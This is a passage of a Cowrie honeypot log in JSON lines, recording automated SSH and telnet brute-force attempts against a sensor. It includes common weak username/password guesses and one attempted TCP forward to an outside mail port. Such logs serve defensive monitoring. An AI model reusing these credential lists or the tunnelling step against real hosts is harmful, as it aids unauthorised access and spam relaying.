{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-28T12:35:00.188552Z","src_ip":"212.227.235.229","session":"d7908ff9205a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T12:35:00.206427Z","src_ip":"212.227.235.229","session":"d7908ff9205a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50554,"dst_ip":"1.2.3.4","dst_port":22,"session":"b5552f125d3b","protocol":"ssh","message":"New connection: 212.227.125.160:50554 (1.2.3.4:22) [session: b5552f125d3b]","sensor":"my-vps","timestamp":"2025-08-28T12:35:31.943734Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:35:31.944664Z","src_ip":"212.227.125.160","session":"b5552f125d3b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:35:32.119217Z","src_ip":"212.227.125.160","session":"b5552f125d3b"}
{"eventid":"cowrie.login.failed","username":"www-data","password":"1234567","message":"login attempt [www-data/1234567] failed","sensor":"my-vps","timestamp":"2025-08-28T12:35:32.966315Z","src_ip":"212.227.125.160","session":"b5552f125d3b"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:35:34.368981Z","src_ip":"212.227.125.160","session":"b5552f125d3b"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.149.186","src_port":54124,"dst_ip":"1.2.3.4","dst_port":23,"session":"ffac6e554029","protocol":"telnet","message":"New connection: 176.65.149.186:54124 (1.2.3.4:23) [session: ffac6e554029]","sensor":"my-vps","timestamp":"2025-08-28T12:35:58.911017Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T12:35:58.949586Z","src_ip":"176.65.149.186","session":"ffac6e554029"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T12:35:58.966260Z","src_ip":"176.65.149.186","session":"ffac6e554029"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-28T12:35:58.967424Z","src_ip":"176.65.149.186","session":"ffac6e554029"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-28T12:35:58.968207Z","src_ip":"176.65.149.186","session":"ffac6e554029"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49908,"dst_ip":"1.2.3.4","dst_port":22,"session":"e454f7f680b3","protocol":"ssh","message":"New connection: 212.227.125.160:49908 (1.2.3.4:22) [session: e454f7f680b3]","sensor":"my-vps","timestamp":"2025-08-28T12:36:12.239277Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:36:12.302941Z","src_ip":"212.227.125.160","session":"e454f7f680b3"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:36:12.440824Z","src_ip":"212.227.125.160","session":"e454f7f680b3"}
{"eventid":"cowrie.login.failed","username":"webmaster","password":"123456","message":"login attempt [webmaster/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T12:36:13.098069Z","src_ip":"212.227.125.160","session":"e454f7f680b3"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:36:14.343535Z","src_ip":"212.227.125.160","session":"e454f7f680b3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50190,"dst_ip":"1.2.3.4","dst_port":22,"session":"cfe3c11e823f","protocol":"ssh","message":"New connection: 212.227.125.160:50190 (1.2.3.4:22) [session: cfe3c11e823f]","sensor":"my-vps","timestamp":"2025-08-28T12:36:52.781165Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:36:52.785530Z","src_ip":"212.227.125.160","session":"cfe3c11e823f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:36:53.010796Z","src_ip":"212.227.125.160","session":"cfe3c11e823f"}
{"eventid":"cowrie.login.failed","username":"webmaster","password":"password","message":"login attempt [webmaster/password] failed","sensor":"my-vps","timestamp":"2025-08-28T12:36:53.794234Z","src_ip":"212.227.125.160","session":"cfe3c11e823f"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:36:54.963669Z","src_ip":"212.227.125.160","session":"cfe3c11e823f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":19563,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f691b75e1dd","protocol":"ssh","message":"New connection: 212.227.235.229:19563 (1.2.3.4:22) [session: 1f691b75e1dd]","sensor":"my-vps","timestamp":"2025-08-28T12:37:06.799261Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T12:37:06.800206Z","src_ip":"212.227.235.229","session":"1f691b75e1dd"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T12:37:06.926449Z","src_ip":"212.227.235.229","session":"1f691b75e1dd"}
{"eventid":"cowrie.login.success","username":"root","password":"pgj-heu05HQM=bMvz","message":"login attempt [root/pgj-heu05HQM=bMvz] succeeded","sensor":"my-vps","timestamp":"2025-08-28T12:37:07.928144Z","src_ip":"212.227.235.229","session":"1f691b75e1dd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"81.19.77.166","dst_port":587,"src_ip":"212.227.235.229","src_port":22,"message":"direct-tcp connection request to 81.19.77.166:587 from 127.0.0.1:22","sensor":"my-vps","timestamp":"2025-08-28T12:37:08.055352Z","session":"1f691b75e1dd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"81.19.77.166","dst_port":587,"data":"b'E'","id":0,"message":"discarded direct-tcp forward request 0 to 81.19.77.166:587 with data b'E'","sensor":"my-vps","timestamp":"2025-08-28T12:37:08.187378Z","src_ip":"212.227.235.229","session":"1f691b75e1dd"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:37:08.315249Z","src_ip":"212.227.235.229","session":"1f691b75e1dd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40018,"dst_ip":"1.2.3.4","dst_port":22,"session":"87dd49c9c263","protocol":"ssh","message":"New connection: 212.227.125.160:40018 (1.2.3.4:22) [session: 87dd49c9c263]","sensor":"my-vps","timestamp":"2025-08-28T12:37:33.823761Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:37:33.824769Z","src_ip":"212.227.125.160","session":"87dd49c9c263"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:37:33.989386Z","src_ip":"212.227.125.160","session":"87dd49c9c263"}
{"eventid":"cowrie.login.failed","username":"webmaster","password":"123456789","message":"login attempt [webmaster/123456789] failed","sensor":"my-vps","timestamp":"2025-08-28T12:37:34.486801Z","src_ip":"212.227.125.160","session":"87dd49c9c263"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:37:35.653297Z","src_ip":"212.227.125.160","session":"87dd49c9c263"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:38:00.209279Z","src_ip":"212.227.235.229","session":"d7908ff9205a"}
{"eventid":"cowrie.session.closed","duration":180.21477460861206,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:38:00.213484Z","src_ip":"212.227.235.229","session":"d7908ff9205a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41930,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c964a67de73","protocol":"ssh","message":"New connection: 212.227.125.160:41930 (1.2.3.4:22) [session: 2c964a67de73]","sensor":"my-vps","timestamp":"2025-08-28T12:38:16.214414Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:38:16.215366Z","src_ip":"212.227.125.160","session":"2c964a67de73"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:38:16.396554Z","src_ip":"212.227.125.160","session":"2c964a67de73"}
{"eventid":"cowrie.login.failed","username":"webmaster","password":"12345","message":"login attempt [webmaster/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T12:38:16.945743Z","src_ip":"212.227.125.160","session":"2c964a67de73"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:38:18.186426Z","src_ip":"212.227.125.160","session":"2c964a67de73"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56982,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb63f33c31a1","protocol":"ssh","message":"New connection: 217.72.205.35:56982 (1.2.3.4:22) [session: cb63f33c31a1]","sensor":"my-vps","timestamp":"2025-08-28T12:38:39.228250Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:38:39.230815Z","src_ip":"217.72.205.35","session":"cb63f33c31a1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:38:58.973117Z","src_ip":"176.65.149.186","session":"ffac6e554029"}
{"eventid":"cowrie.session.closed","duration":180.0650396347046,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:38:58.975980Z","src_ip":"176.65.149.186","session":"ffac6e554029"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54894,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd0af20017fd","protocol":"ssh","message":"New connection: 212.227.125.160:54894 (1.2.3.4:22) [session: dd0af20017fd]","sensor":"my-vps","timestamp":"2025-08-28T12:38:59.021964Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:38:59.022856Z","src_ip":"212.227.125.160","session":"dd0af20017fd"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:38:59.192893Z","src_ip":"212.227.125.160","session":"dd0af20017fd"}
{"eventid":"cowrie.login.failed","username":"webmaster","password":"12345678","message":"login attempt [webmaster/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T12:38:59.707294Z","src_ip":"212.227.125.160","session":"dd0af20017fd"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:39:00.880557Z","src_ip":"212.227.125.160","session":"dd0af20017fd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35042,"dst_ip":"1.2.3.4","dst_port":22,"session":"e75c6a06bd63","protocol":"ssh","message":"New connection: 212.227.125.160:35042 (1.2.3.4:22) [session: e75c6a06bd63]","sensor":"my-vps","timestamp":"2025-08-28T12:39:44.828050Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:39:44.829980Z","src_ip":"212.227.125.160","session":"e75c6a06bd63"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:39:45.006361Z","src_ip":"212.227.125.160","session":"e75c6a06bd63"}
{"eventid":"cowrie.login.failed","username":"webmaster","password":"qwerty","message":"login attempt [webmaster/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-28T12:39:45.535214Z","src_ip":"212.227.125.160","session":"e75c6a06bd63"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:39:46.819842Z","src_ip":"212.227.125.160","session":"e75c6a06bd63"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56500,"dst_ip":"1.2.3.4","dst_port":22,"session":"f287333026c9","protocol":"ssh","message":"New connection: 212.227.125.160:56500 (1.2.3.4:22) [session: f287333026c9]","sensor":"my-vps","timestamp":"2025-08-28T12:40:28.951003Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:40:28.965508Z","src_ip":"212.227.125.160","session":"f287333026c9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-s